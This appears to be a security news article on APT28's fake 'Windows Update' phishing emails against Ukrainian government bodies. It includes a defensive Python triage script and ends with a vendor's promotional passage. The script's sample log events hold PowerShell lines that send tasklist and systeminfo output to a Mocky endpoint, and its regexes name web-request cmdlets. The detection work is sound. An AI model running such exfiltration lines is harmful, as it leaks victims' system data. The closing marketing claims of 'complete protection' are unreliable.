Ukraine’s Computer Emergency Response Team (CERT-UA) has warned of cyber attacks by Russian nation-state hackers against various government bodies in the country.
The agency attributed the phishing campaign to APT28, which also goes by the names Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit and Sofacy.
The emails carry the subject line “Windows Update” and contain instructions, written in Ukrainian, to run a PowerShell command under the guise of installing security updates.
Running that command loads and executes a next-stage PowerShell script that gathers basic system information with commands such as `tasklist` and `systeminfo`, and exfiltrates the results in an HTTP request to the Mocky API, a free service for hosting mock HTTP endpoints.
To trick targets into running the command, the emails impersonated system administrators of the targeted government entities, using fake Microsoft Outlook email accounts created with the employees’ real names and initials.
CERT-UA recommends that organizations restrict users’ ability to run PowerShell scripts and monitor network connections to the Mocky API.
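The two recommendations above translate directly into a detection: flag PowerShell activity that combines host reconnaissance (`tasklist`, `systeminfo`) with an outbound web request, and flag any contact with the Mocky API on its own. The following triage script is an added example, not code from CERT-UA or from the campaign; it runs over constructed log entries shaped like Windows PowerShell script-block logging records (Event ID 4104, `ScriptBlockText`), and it assumes `run.mocky.io` is the hostname such traffic would show.

```python
"""Triage PowerShell script-block log entries for the recon-then-exfiltrate
pattern described above: tasklist/systeminfo output posted to the Mocky API.

Added example (not CERT-UA's or the attacker's code). SAMPLE_EVENTS are
constructed to resemble Event ID 4104 records; none are real captures.
The run.mocky.io hostname is an assumption about the service endpoint.
"""
import re

# Host-reconnaissance commands named in the CERT-UA description.
RECON_RE = re.compile(r"\b(tasklist|systeminfo)\b", re.IGNORECASE)

# Cmdlets, aliases and .NET types commonly used for outbound HTTP from PowerShell.
WEB_RE = re.compile(
    r"\b(Invoke-WebRequest|Invoke-RestMethod|iwr|irm|curl|wget|Start-BitsTransfer)\b"
    r"|Net\.WebClient|System\.Net\.Http",
    re.IGNORECASE,
)

# Any reference to the Mocky API is worth a look on its own (assumed hostname).
MOCKY_RE = re.compile(r"\bmocky\.io\b", re.IGNORECASE)


def analyze_script(script):
    """Return the indicators found in one ScriptBlockText and a severity.

    high   - recon command(s) plus a web request (the campaign's pattern)
    medium - contact with the Mocky API without recon in the same block
    low    - recon only (common for administrators; worth correlating, not alerting)
    None   - nothing of interest
    """
    recon = sorted({m.lower() for m in RECON_RE.findall(script)})
    web = WEB_RE.search(script) is not None
    mocky = MOCKY_RE.search(script) is not None
    if recon and (web or mocky):
        severity = "high"
    elif mocky:
        severity = "medium"
    elif recon:
        severity = "low"
    else:
        severity = None
    return {"recon": recon, "web_request": web, "mocky": mocky, "severity": severity}


def triage(events):
    """Return (event id, severity) for every event that scored, in log order."""
    findings = []
    for ev in events:
        result = analyze_script(ev["script"])
        if result["severity"]:
            findings.append((ev["id"], result["severity"]))
    return findings


# Constructed sample records; hostnames, users and the /v3/example-id path are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws-01", "user": "GOV\\analyst1",
     "script": "Get-ChildItem -Path C:\\Users\\analyst1\\Documents -Recurse | Measure-Object"},
    {"id": 2, "host": "ws-02", "user": "GOV\\clerk4",
     "script": "$i = (tasklist) + (systeminfo); Invoke-WebRequest -Uri "
               "https://run.mocky.io/v3/example-id -Method POST -Body ($i -join ', ')"},
    {"id": 3, "host": "srv-01", "user": "GOV\\itadmin",
     "script": "systeminfo | Out-File -FilePath C:\\inventory\\srv-01.txt"},
    {"id": 4, "host": "ws-03", "user": "GOV\\dev2",
     "script": "Invoke-RestMethod -Uri https://run.mocky.io/v3/example-id"},
    {"id": 5, "host": "ws-04", "user": "GOV\\clerk9",
     "script": "irm -Uri https://run.mocky.io/v3/example-id -Method Post "
               "-Body (tasklist /v | Out-String)"},
]

if __name__ == "__main__":
    for event_id, severity in triage(SAMPLE_EVENTS):
        ev = next(e for e in SAMPLE_EVENTS if e["id"] == event_id)
        print(f"[{severity:6}] event {event_id} on {ev['host']} by {ev['user']}")
```

On a real host the input would come from `Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object Id -eq 4104`, which only yields useful `ScriptBlockText` if script block logging is enabled; event 3 shows why recon alone is scored low rather than alerted, since administrators run `systeminfo` routinely, while event 4 shows that a Mocky contact is flagged even without recon, matching the recommendation to monitor those connections.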
The disclosure comes weeks after APT28 was linked to attacks that exploit now-patched security flaws in network equipment to perform reconnaissance and deploy malware against selected targets.
Google’s Threat Analysis Group (TAG), in an advisory released last month, detailed a credential harvesting operation in which the threat actor redirected visitors to Ukrainian government websites to phishing pages.
Hacking teams based in Russia have also been linked to exploitation of a critical privilege escalation flaw in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) in targeted intrusions against the government, transport, energy and military sectors in Europe.
The development also comes as Fortinet FortiGuard Labs discovered a multi-stage phishing attack that uses a macro-laced Word document, purportedly from Ukraine’s Energoatom, as a lure to deliver the open-source Havoc post-exploitation framework.
“It is highly likely that Russian intelligence, military and law enforcement services have a long-standing tacit understanding with cybercriminal threat actors,” cybersecurity firm Recorded Future said in a report earlier this year.
“In some cases, it is almost certain that these agencies maintain an established and systematic relationship with cybercriminal threat actors, either through indirect collaboration or through recruitment.”
Recently, the hacking group known as APT28 was reported to have targeted Ukrainian government entities with fake “Windows Update” emails. The emails were spear-phishing messages that instructed recipients to run a malicious PowerShell command.
As a full-stack tech company, Ikaroa is constantly researching new threats and how we can help defend our clients against attacks like this one. Our team of security experts stays on top of the latest trends in digital security threats and is actively developing solutions to keep businesses safe.
This malicious email campaign is part of an ongoing trend of cyber attacks that use tactics such as fake email notifications to gain access to important information. Our experts offer guidance on anti-virus and other security measures for our clients.
At Ikaroa we believe that the only way to stay safe in an increasingly digital world is by understanding the risks and taking the necessary security measures to guard against such threats. To that end, we have developed solutions that help protect against malicious emails, such as those sent by APT28.
We are committed to providing comprehensive security solutions that keep our clients safe and secure and help prevent them from falling victim to threats such as this one. Our solutions offer complete protection and give our clients peace of mind as they go about their digital activities.